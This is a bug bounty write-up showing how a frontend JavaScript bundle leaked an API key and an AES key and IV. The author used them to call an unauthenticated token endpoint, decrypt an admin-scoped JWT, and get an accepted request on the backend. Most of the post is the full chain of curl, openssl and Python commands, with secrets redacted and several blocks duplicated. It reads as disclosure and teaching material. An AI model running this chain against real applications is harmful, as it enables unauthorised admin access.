July 15, 2026
I Asked the Frontend for Secrets, and It Said Yes
Target, domains, API keys, tokens, SSO IDs, and organisation names are redacted. This write-up is for educational purposes and describes…

By Devansh Patel
2 min read
Target, domains, API keys, tokens, SSO IDs, and organisation names are redacted. This write-up is for educational purposes and describes testing performed in an authorised UAT bug bounty scope.
Summary
While testing a web application, I found that the frontend JavaScript bundle contained enough information to call an unauthenticated token-generation API and decrypt the encrypted response locally.
The issue was not just that an API key existed in JavaScript. The stronger finding was that the frontend also exposed the AES key and IV required to decrypt the API response. This allowed a tester to obtain a valid API bearer token and inspect its JWT claims.
What I Found
The application shipped a minified JavaScript bundle that contained:
const API_BASE = "https://<REDACTED_API_DOMAIN>/<REDACTED_PATH>/";
const API_KEY = "<REDACTED_API_KEY>";
const AES_KEY = "<REDACTED_32_BYTE_AES_KEY>";
const AES_IV = "<REDACTED_16_BYTE_AES_IV>";const API_BASE = "https://<REDACTED_API_DOMAIN>/<REDACTED_PATH>/";
const API_KEY = "<REDACTED_API_KEY>";
const AES_KEY = "<REDACTED_32_BYTE_AES_KEY>";
const AES_IV = "<REDACTED_16_BYTE_AES_IV>";The bundle used these values to encrypt/decrypt API payloads client-side.
The token endpoint was also visible in the bundle:
POST /<REDACTED_PATH>/api/user/cognito-tokenPOST /<REDACTED_PATH>/api/user/cognito-tokenThe request only required the exposed API key:
curl -i 'https://<REDACTED_API_DOMAIN>/<REDACTED_PATH>/api/user/cognito-token' \
-X POST \
-H 'Content-Type: application/json' \
-H 'x-api-key: <REDACTED_API_KEY>' \
--data '{}'curl -i 'https://<REDACTED_API_DOMAIN>/<REDACTED_PATH>/api/user/cognito-token' \
-X POST \
-H 'Content-Type: application/json' \
-H 'x-api-key: <REDACTED_API_KEY>' \
--data '{}'The server returned an encrypted payload:
{
"response": {
"responseCode": 200,
"responseMsg": "Cognito Token Generated Successfully"
},
"data": {
"error": false,
"result": {
"payload": "<ENCRYPTED_BASE64_PAYLOAD>"
}
}
}{
"response": {
"responseCode": 200,
"responseMsg": "Cognito Token Generated Successfully"
},
"data": {
"error": false,
"result": {
"payload": "<ENCRYPTED_BASE64_PAYLOAD>"
}
}
}Decrypting the Response
Because the AES key and IV were present in the frontend bundle, the encrypted response could be decrypted locally.
First, save the encrypted payload:
curl -s 'https://<REDACTED_API_DOMAIN>/<REDACTED_PATH>/api/user/cognito-token' \
-X POST \
-H 'Content-Type: application/json' \
-H 'x-api-key: <REDACTED_API_KEY>' \
--data '{}' \
-o cognito_response.json
python3 - <<'PY'
import json
data = json.load(open("cognito_response.json"))
payload = data["data"]["result"]["payload"]
open("cognito_payload.b64", "w").write(payload)
print("Encrypted payload length:", len(payload))
PYcurl -s 'https://<REDACTED_API_DOMAIN>/<REDACTED_PATH>/api/user/cognito-token' \
-X POST \
-H 'Content-Type: application/json' \
-H 'x-api-key: <REDACTED_API_KEY>' \
--data '{}' \
-o cognito_response.json
python3 - <<'PY'
import json
data = json.load(open("cognito_response.json"))
payload = data["data"]["result"]["payload"]
open("cognito_payload.b64", "w").write(payload)
print("Encrypted payload length:", len(payload))
PYThen decrypt it:
openssl enc -aes-256-cbc -d -base64 -A \
-K <REDACTED_AES_KEY_HEX> \
-iv <REDACTED_AES_IV_HEX> \
-in cognito_payload.b64 \
-out cognito_decrypted.jsonopenssl enc -aes-256-cbc -d -base64 -A \
-K <REDACTED_AES_KEY_HEX> \
-iv <REDACTED_AES_IV_HEX> \
-in cognito_payload.b64 \
-out cognito_decrypted.jsonThe decrypted response contained a JWT access token:
{
"error": false,
"result": {
"access_token": "<REDACTED_JWT>"
}
}{
"error": false,
"result": {
"access_token": "<REDACTED_JWT>"
}
}Inspecting the JWT
The JWT was a normal three-part token:
python3 - <<'PY'
import json
token = json.load(open("cognito_decrypted.json"))["result"]["access_token"]
print("JWT part count:", token.count(".") + 1)
print("JWT part lengths:", [len(x) for x in token.split(".")])
PYpython3 - <<'PY'
import json
token = json.load(open("cognito_decrypted.json"))["result"]["access_token"]
print("JWT part count:", token.count(".") + 1)
print("JWT part lengths:", [len(x) for x in token.split(".")])
PYThe interesting part was the scope:
admin/write admin/readadmin/write admin/readConfirming API Use
To avoid touching sensitive records, I tested a harmless lookup endpoint.
The application expected encrypted JSON bodies, so I encrypted this body:
{"pincode":"400001"}{"pincode":"400001"}Command:
cat > pincode.json <<'JSON'
{"pincode":"400001"}
JSON
openssl enc -aes-256-cbc -base64 -A \
-K <REDACTED_AES_KEY_HEX> \
-iv <REDACTED_AES_IV_HEX> \
-in pincode.json \
-out pincode_payload.b64cat > pincode.json <<'JSON'
{"pincode":"400001"}
JSON
openssl enc -aes-256-cbc -base64 -A \
-K <REDACTED_AES_KEY_HEX> \
-iv <REDACTED_AES_IV_HEX> \
-in pincode.json \
-out pincode_payload.b64Then I sent the request with the decrypted bearer token:
TOKEN="$(python3 - <<'PY'
import json
print(json.load(open("cognito_decrypted.json"))["result"]["access_token"])
PY
)"
PAYLOAD="$(cat pincode_payload.b64)"
curl -i 'https://<REDACTED_API_DOMAIN>/<REDACTED_PATH>/api/form/pincode' \
-X POST \
-H 'Content-Type: application/json' \
-H 'x-api-key: <REDACTED_API_KEY>' \
-H "Authorization: Bearer $TOKEN" \
-H 'user-role: PROSPECT' \
--data "{\"payload\":\"$PAYLOAD\"}"TOKEN="$(python3 - <<'PY'
import json
print(json.load(open("cognito_decrypted.json"))["result"]["access_token"])
PY
)"
PAYLOAD="$(cat pincode_payload.b64)"
curl -i 'https://<REDACTED_API_DOMAIN>/<REDACTED_PATH>/api/form/pincode' \
-X POST \
-H 'Content-Type: application/json' \
-H 'x-api-key: <REDACTED_API_KEY>' \
-H "Authorization: Bearer $TOKEN" \
-H 'user-role: PROSPECT' \
--data "{\"payload\":\"$PAYLOAD\"}"The server returned HTTP/2 200 and an encrypted response payload, confirming the token was accepted by the backend.
I was happy that got a P1
so I went straight away to report it and got this
BUT IT STILL MATTERS
If you want read more stories like these:
Unauthenticated Image Access and EXIF Location Leak, Easy P4, you can find under 2 mins Hello people. Here's another blog; this one is another bug you can find real quick.
How I hacked a website just by looking at the source code Part-2 This is a very easy P4 bug.
How i hacked a website just by looking at the source code FREE LINK
**How I Crashed Example Health's CORS Party ** FREE LINK
Stay curious. Stay dangerous. 💻🕶